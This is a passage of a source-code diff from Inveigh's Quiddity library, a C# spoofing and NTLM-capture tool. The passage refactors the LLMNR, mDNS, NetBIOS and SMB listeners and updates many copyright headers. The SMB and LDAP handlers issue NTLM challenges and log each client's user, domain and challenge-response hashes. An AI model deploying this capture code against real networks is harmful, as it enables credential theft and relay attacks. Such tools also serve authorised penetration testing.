= BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); - string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); - OutputNTLM("LDAP", listenerPort, clientIP, clientPort, user, domain, host, ntlmChallenge, response2, lmResponse); + LDAPBindRequest bind = new LDAPBindRequest(); + bind.ReadBytes((byte[][])message.ProtocolOp); + LDAPSaslCredentials sasl = new LDAPSaslCredentials(); + sasl.ReadBytes(bind.Authentication); + NTLMNegotiate ntlm = new NTLMNegotiate(); + ntlm.ReadBytes(sasl.Credentials, 0); + + if (ntlm.MessageType == 1) + { + NTLMChallenge challenge = new NTLMChallenge(Challenge, NetbiosDomain, ComputerName, DNSDomain, ComputerName, DNSDomain); + byte[] challengeData = challenge.GetBytes(ComputerName); + ntlmChallenge = BitConverter.ToString(challenge.ServerChallenge).Replace("-", ""); + + LDAPBindResponse bindResponse = new LDAPBindResponse + { + ServerSaslCreds = challengeData + }; + + LDAPMessage bindMessage = new LDAPMessage + { + MessageID = message.MessageID, + ProtocolOp = bindResponse + }; + + buffer = bindMessage.Encode(3); + OutputChallenge(listenerPort, clientIP, clientPort, ntlmChallenge); + } + else if (ntlm.MessageType == 3) + { + NTLMResponse ntlmResponse = new NTLMResponse(sasl.Credentials, false); + string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); + string user = Encoding.Unicode.GetString(ntlmResponse.UserName); + string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); + string response2 = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); + string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); + OutputNTLM("LDAP", listenerPort, clientIP, clientPort, user, domain, host, ntlmChallenge, response2, lmResponse); + } + } + tcpStream.Write(buffer, 0, buffer.Length); + tcpStream.Flush(); } - tcpStream.Write(buffer, 0, buffer.Length); - tcpStream.Flush(); + } + catch (Exception ex) + { + OutputError(ex, port); } } diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LLMNRListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LLMNRListener.cs index a16d513..8ede4fa 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LLMNRListener.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LLMNRListener.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -31,8 +31,10 @@ */ using Quiddity.LLMNR; using System; +using System.Diagnostics; using System.Net; using System.Net.Sockets; +using System.Threading; namespace Quiddity { @@ -46,8 +48,21 @@ namespace Quiddity public new void Start(IPAddress ipAddress, string replyIP, string replyIPv6) { + Start(ipAddress, replyIP, replyIPv6, 0); + } + + public void Start(IPAddress ipAddress, string replyIP, string replyIPv6, int runTime) + { UDPListener listener = new UDPListener(AddressFamily.InterNetwork); IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 5355); + isRunning = true; + IAsyncResult udpAsync; + Stopwatch stopwatchRunTime = new Stopwatch(); + + if (runTime > 0) + { + stopwatchRunTime.Start(); + } if (String.Equals(ipAddress.AddressFamily.ToString(), "InterNetwork")) { @@ -61,13 +76,32 @@ namespace Quiddity listener.Client.Bind(ipEndPoint); - while (true) + while (isRunning) { try { - byte[] receiveBuffer = listener.Receive(ref ipEndPoint); - ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); + udpAsync = listener.BeginReceive(null, null); + + do + { + Thread.Sleep(10); + + if (!isRunning || stopwatchRunTime.IsRunning && stopwatchRunTime.Elapsed.Minutes >= runTime) + { + isRunning = false; + break; + } + + } + while (!udpAsync.IsCompleted); + + if (isRunning) + { + byte[] receiveBuffer = listener.EndReceive(udpAsync, ref ipEndPoint); + ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); + } + } catch (Exception ex) { diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/MDNSListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/MDNSListener.cs index 973329b..45c7abb 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/MDNSListener.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/MDNSListener.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -31,8 +31,10 @@ */ using Quiddity.MDNS; using System; +using System.Diagnostics; using System.Net; using System.Net.Sockets; +using System.Threading; namespace Quiddity { @@ -53,8 +55,16 @@ namespace Quiddity public new void Start(IPAddress ipAddress, string replyIP, string replyIPv6) { + Start(ipAddress, replyIP, replyIPv6, 0); + } + + public void Start(IPAddress ipAddress, string replyIP, string replyIPv6, int runTime) + { UDPListener listener = new UDPListener(AddressFamily.InterNetwork); IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 5353); + isRunning = true; + IAsyncResult udpAsync; + Stopwatch stopwatchRunTime = new Stopwatch(); if (string.Equals(ipAddress.AddressFamily.ToString(), "InterNetwork")) { @@ -68,13 +78,31 @@ namespace Quiddity listener.Client.Bind(ipEndPoint); - while (true) + while (isRunning) { try { - byte[] receiveBuffer = listener.Receive(ref ipEndPoint); - ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); + udpAsync = listener.BeginReceive(null, null); + + do + { + Thread.Sleep(10); + + if (!isRunning || stopwatchRunTime.IsRunning && stopwatchRunTime.Elapsed.Minutes >= runTime) + { + isRunning = false; + break; + } + + } + while (!udpAsync.IsCompleted); + + if (isRunning) + { + byte[] receiveBuffer = listener.EndReceive(udpAsync, ref ipEndPoint); + ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); + } } catch (Exception ex) { diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/NetBIOSNSListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/NetBIOSNSListener.cs index f2754d6..a5627e9 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/NetBIOSNSListener.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/NetBIOSNSListener.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -31,8 +31,10 @@ */ using Quiddity.NetBIOS; using System; +using System.Diagnostics; using System.Net; using System.Net.Sockets; +using System.Threading; namespace Quiddity { @@ -48,20 +50,51 @@ namespace Quiddity this.TTL = ttl; } - public void Start(IPAddress ipAddress, string replyIP) + public new void Start(IPAddress ipAddress, string replyIP) + { + Start(ipAddress, replyIP, 0); + } + + public void Start(IPAddress ipAddress, string replyIP, int runTime) { UDPListener listener = new UDPListener(AddressFamily.InterNetwork); IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 137); + isRunning = true; + IAsyncResult udpAsync; + Stopwatch stopwatchRunTime = new Stopwatch(); + + if (runTime > 0) + { + stopwatchRunTime.Start(); + } listener.Client.Bind(ipEndPoint); - while (true) + while (isRunning) { try { - byte[] receiveBuffer = listener.Receive(ref ipEndPoint); - ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP); + udpAsync = listener.BeginReceive(null, null); + + do + { + Thread.Sleep(10); + + if (!isRunning || stopwatchRunTime.IsRunning && stopwatchRunTime.Elapsed.Minutes >= runTime) + { + break; + } + + } + while (!udpAsync.IsCompleted); + + if (isRunning) + { + byte[] receiveBuffer = listener.EndReceive(udpAsync, ref ipEndPoint); + ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP); + } + } catch (Exception ex) { diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/SMBListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/SMBListener.cs index 60d4684..3f93d71 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/SMBListener.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/SMBListener.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -85,9 +85,13 @@ namespace Quiddity } while (!tcpAsync.IsCompleted); - tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); - object[] parameters = { guid, tcpClient }; - ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); + if (isRunning) + { + tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); + object[] parameters = { guid, tcpClient, port }; + ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); + } + } catch (Exception ex) { @@ -109,8 +113,9 @@ namespace Quiddity internal void ReceiveClient(object parameters) { object[] parameterArray = parameters as object[]; - Guid serverGuid = (Guid)parameterArray[0]; + Guid serverGuid = (Guid)parameterArray[0]; TcpClient tcpClient = (TcpClient)parameterArray[1]; + int port = (int)parameterArray[2]; NetworkStream tcpStream = tcpClient.GetStream(); bool isSMB2; string challenge = ""; @@ -118,156 +123,165 @@ namespace Quiddity string clientPort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString(); string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString(); - while (tcpClient.Connected && isRunning) + try { - byte[] requestData = new byte[4096]; - do + while (tcpClient.Connected && isRunning) { - Thread.Sleep(100); - } - while (!tcpStream.DataAvailable && tcpClient.Connected); + byte[] requestData = new byte[4096]; - while (tcpStream.DataAvailable) - { - tcpStream.Read(requestData, 0, requestData.Length); - } - - NetBIOSSessionService requestNetBIOSSessionService = new NetBIOSSessionService(requestData); - SMBHelper smbHelper = new SMBHelper(); - - if (requestNetBIOSSessionService.Type == 0 || smbHelper.Protocol[0] == 0xfe || smbHelper.Protocol[0] == 0xff) - { - int sessionServiceIndex = 0; - - if (requestNetBIOSSessionService.Type == 0) + do { - sessionServiceIndex = 4; + Thread.Sleep(100); } + while (!tcpStream.DataAvailable && tcpClient.Connected); - byte[] sendBuffer = new byte[0]; - SMBHeader requestSMBHeader = new SMBHeader(); - SMB2Header requestSMB2Header = new SMB2Header(); - smbHelper.ReadBytes(requestData, sessionServiceIndex); - - if (smbHelper.Protocol[0] == 0xfe) - { - isSMB2 = true; - requestSMB2Header.ReadBytes(requestData, sessionServiceIndex); - } - else + while (tcpStream.DataAvailable) { - isSMB2 = false; - requestSMBHeader.ReadBytes(requestData, sessionServiceIndex); + tcpStream.Read(requestData, 0, requestData.Length); } - if (!isSMB2 && requestSMBHeader.Command == 0x72 || (isSMB2 && requestSMB2Header.Command == 0)) + NetBIOSSessionService requestNetBIOSSessionService = new NetBIOSSessionService(requestData); + SMBHelper smbHelper = new SMBHelper(); // todo check + + if (requestNetBIOSSessionService.Type == 0 || smbHelper.Protocol[0] == 0xfe || smbHelper.Protocol[0] == 0xff) { - SMB2NegotiatelRequest smb2NegotiatelRequest = new SMB2NegotiatelRequest(requestData, 64 + sessionServiceIndex); - SMB2Header responseSMB2Header = new SMB2Header(); - SMB2NegotiateResponse smb2NegotiateResponse = new SMB2NegotiateResponse(); + int sessionServiceIndex = 0; + + if (requestNetBIOSSessionService.Type == 0) + { + sessionServiceIndex = 4; + } + + byte[] sendBuffer = new byte[0]; + SMBHeader requestSMBHeader = new SMBHeader(); + SMB2Header requestSMB2Header = new SMB2Header(); + smbHelper.ReadBytes(requestData, sessionServiceIndex); - if (!isSMB2) + if (smbHelper.Protocol[0] == 0xfe) { - smb2NegotiateResponse.DialectRivision = new byte[2] { 0xff, 0x02 }; - smb2NegotiateResponse.Capabilities = new byte[4] { 0x07, 0x00, 0x00, 0x00 }; - OutputNegotiation("SMB1", listenerPort, clientIP, clientPort); + isSMB2 = true; + requestSMB2Header.ReadBytes(requestData, sessionServiceIndex); } - else if (isSMB2) + else { - responseSMB2Header.MessageId = requestSMB2Header.MessageId; + isSMB2 = false; + requestSMBHeader.ReadBytes(requestData, sessionServiceIndex); + } - if (smb2NegotiatelRequest.GetMaxDialect() == 0x311) - { - smb2NegotiateResponse.DialectRivision = new byte[2] { 0x11, 0x03 }; - smb2NegotiateResponse.NegotiateContextCount = 3; - smb2NegotiateResponse.Capabilities = new byte[4] { 0x2f, 0x00, 0x00, 0x00 }; - smb2NegotiateResponse.NegotiateContextOffset = 448; - smb2NegotiateResponse.NegotiateContextList = new SMB2NegotiateContext().GetBytes(new string[] { "1", "2", "3" }); - OutputNegotiation("SMB3", listenerPort, clientIP, clientPort); - } - else + if (!isSMB2 && requestSMBHeader.Command == 0x72 || (isSMB2 && requestSMB2Header.Command == 0)) + { + SMB2NegotiatelRequest smb2NegotiatelRequest = new SMB2NegotiatelRequest(requestData, 64 + sessionServiceIndex); + SMB2Header responseSMB2Header = new SMB2Header(); + SMB2NegotiateResponse smb2NegotiateResponse = new SMB2NegotiateResponse(); + + if (!isSMB2) { - smb2NegotiateResponse.DialectRivision = new byte[2] { 0x10, 0x02 }; + smb2NegotiateResponse.DialectRivision = new byte[2] { 0xff, 0x02 }; smb2NegotiateResponse.Capabilities = new byte[4] { 0x07, 0x00, 0x00, 0x00 }; - OutputNegotiation("SMB2", listenerPort, clientIP, clientPort); + OutputNegotiation("SMB1", listenerPort, clientIP, clientPort); } + else if (isSMB2) + { + responseSMB2Header.MessageId = requestSMB2Header.MessageId; - responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; // todo fix - } + if (smb2NegotiatelRequest.GetMaxDialect() == 0x311) + { + smb2NegotiateResponse.DialectRivision = new byte[2] { 0x11, 0x03 }; + smb2NegotiateResponse.NegotiateContextCount = 3; + smb2NegotiateResponse.Capabilities = new byte[4] { 0x2f, 0x00, 0x00, 0x00 }; + smb2NegotiateResponse.NegotiateContextOffset = 448; + smb2NegotiateResponse.NegotiateContextList = new SMB2NegotiateContext().GetBytes(new string[] { "1", "2", "3" }); + OutputNegotiation("SMB3", listenerPort, clientIP, clientPort); + } + else + { + smb2NegotiateResponse.DialectRivision = new byte[2] { 0x10, 0x02 }; + smb2NegotiateResponse.Capabilities = new byte[4] { 0x07, 0x00, 0x00, 0x00 }; + OutputNegotiation("SMB2", listenerPort, clientIP, clientPort); + } - smb2NegotiateResponse.EncodeBuffer(); - smb2NegotiateResponse.ServerGUID = serverGuid.ToByteArray(); - sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2NegotiateResponse); - } - else if (isSMB2 && requestSMB2Header.Command > 0) - { + responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; // todo fix + } - switch (requestSMB2Header.Command) + smb2NegotiateResponse.EncodeBuffer(); + smb2NegotiateResponse.ServerGUID = serverGuid.ToByteArray(); + sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2NegotiateResponse); + } + else if (isSMB2 && requestSMB2Header.Command > 0) { - case 1: - { - SMB2SessionSetupRequest smb2SessionSetupRequest = new SMB2SessionSetupRequest(requestData, 64 + sessionServiceIndex); - NTLMNegotiate requestNTLMNegotiate = new NTLMNegotiate(smb2SessionSetupRequest.Buffer, true); + switch (requestSMB2Header.Command) + { - if (requestNTLMNegotiate.MessageType == 1) - { - SMB2Header responseSMB2Header = new SMB2Header(); - SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(); - responseSMB2Header.Status = new byte[4] { 0x16, 0x00, 0x00, 0xc0 }; - responseSMB2Header.CreditCharge = 1; - responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; - responseSMB2Header.Command = 1; - responseSMB2Header.Flags = new byte[4] { 0x11, 0x00, 0x00, 0x00 }; - responseSMB2Header.MessageId = requestSMB2Header.MessageId; - responseSMB2Header.SessionId = BitConverter.GetBytes(smb2Session); - smb2Session++; - smb2SessionSetupResponse.Pack(Challenge, NetbiosDomain, ComputerName, DNSDomain, ComputerName, DNSDomain, out byte[] challengeData); - sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse); - challenge = BitConverter.ToString(challengeData).Replace("-", ""); - OutputChallenge(listenerPort, clientIP, clientPort, challenge); - } - else if (requestNTLMNegotiate.MessageType == 3) + case 1: { - NTLMResponse ntlmResponse = new NTLMResponse(smb2SessionSetupRequest.Buffer, true); - string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); - string user = Encoding.Unicode.GetString(ntlmResponse.UserName); - string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); - string response = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); - string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); - OutputNTLM("SMB", listenerPort, clientIP, clientPort, user, domain, host, challenge, response, lmResponse); - SMB2Header responseSMB2Header = new SMB2Header(); - SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(); - responseSMB2Header.Status = new byte[4] { 0x6d, 0x00, 0x00, 0xc0 }; - //responseSMB2Header.Status = new byte[4] { 0x00, 0x00, 0x00, 0x00 }; - //responseSMB2Header.Status = new byte[4] { 0x22, 0x00, 0x00, 0xc0 }; //access denied - responseSMB2Header.CreditCharge = 1; - responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; - responseSMB2Header.Command = 1; - responseSMB2Header.Flags = new byte[4] { 0x11, 0x00, 0x00, 0x00 }; - responseSMB2Header.MessageId = requestSMB2Header.MessageId; - responseSMB2Header.SessionId = requestSMB2Header.SessionId; - smb2SessionSetupResponse.SecurityBufferOffset = 0; - sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse); + SMB2SessionSetupRequest smb2SessionSetupRequest = new SMB2SessionSetupRequest(requestData, 64 + sessionServiceIndex); + NTLMNegotiate requestNTLMNegotiate = new NTLMNegotiate(smb2SessionSetupRequest.Buffer, true); + + if (requestNTLMNegotiate.MessageType == 1) + { + SMB2Header responseSMB2Header = new SMB2Header(); + SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(); + responseSMB2Header.Status = new byte[4] { 0x16, 0x00, 0x00, 0xc0 }; + responseSMB2Header.CreditCharge = 1; + responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; + responseSMB2Header.Command = 1; + responseSMB2Header.Flags = new byte[4] { 0x11, 0x00, 0x00, 0x00 }; + responseSMB2Header.MessageId = requestSMB2Header.MessageId; + responseSMB2Header.SessionId = BitConverter.GetBytes(smb2Session); + smb2Session++; + smb2SessionSetupResponse.Pack(Challenge, NetbiosDomain, ComputerName, DNSDomain, ComputerName, DNSDomain, out byte[] challengeData); + sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse); + challenge = BitConverter.ToString(challengeData).Replace("-", ""); + OutputChallenge(listenerPort, clientIP, clientPort, challenge); + } + else if (requestNTLMNegotiate.MessageType == 3) + { + NTLMResponse ntlmResponse = new NTLMResponse(smb2SessionSetupRequest.Buffer, true); + string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); + string user = Encoding.Unicode.GetString(ntlmResponse.UserName); + string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); + string response = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); + string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); + OutputNTLM("SMB", listenerPort, clientIP, clientPort, user, domain, host, challenge, response, lmResponse); + SMB2Header responseSMB2Header = new SMB2Header(); + SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(); + responseSMB2Header.Status = new byte[4] { 0x6d, 0x00, 0x00, 0xc0 }; + //responseSMB2Header.Status = new byte[4] { 0x00, 0x00, 0x00, 0x00 }; + //responseSMB2Header.Status = new byte[4] { 0x22, 0x00, 0x00, 0xc0 }; //access denied + responseSMB2Header.CreditCharge = 1; + responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; + responseSMB2Header.Command = 1; + responseSMB2Header.Flags = new byte[4] { 0x11, 0x00, 0x00, 0x00 }; + responseSMB2Header.MessageId = requestSMB2Header.MessageId; + responseSMB2Header.SessionId = requestSMB2Header.SessionId; + smb2SessionSetupResponse.SecurityBufferOffset = 0; + sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse); + } + } + break; - } - break; + } } + tcpStream.Write(sendBuffer, 0, sendBuffer.Length); + tcpStream.Flush(); + } + else + { + tcpClient.Close(); } - tcpStream.Write(sendBuffer, 0, sendBuffer.Length); - tcpStream.Flush(); - } - else - { - tcpClient.Close(); } } + catch (Exception ex) + { + OutputError(ex, port); + } } diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/TCPListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/TCPListener.cs index 44af085..102f773 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/TCPListener.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/TCPListener.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/UDPListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/UDPListener.cs index d0a2f49..70cd01f 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/UDPListener.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/UDPListener.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs index 568a892..faec0fd 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs index 3412b0d..d18df87 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Message.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs index b3bd457..ca81e13 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs index cf34acc..a67f759 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs index 6c50e47..c098446 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs index 606ee13..7dd96fb 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs index 6abb125..08adf57 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs index 250bcef..7a47786 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs index 5abbecb..ca197a7 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs index 7641a32..1727525 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs index b7b4a76..2cf7928 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs index 557e089..d9dc4b6 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson 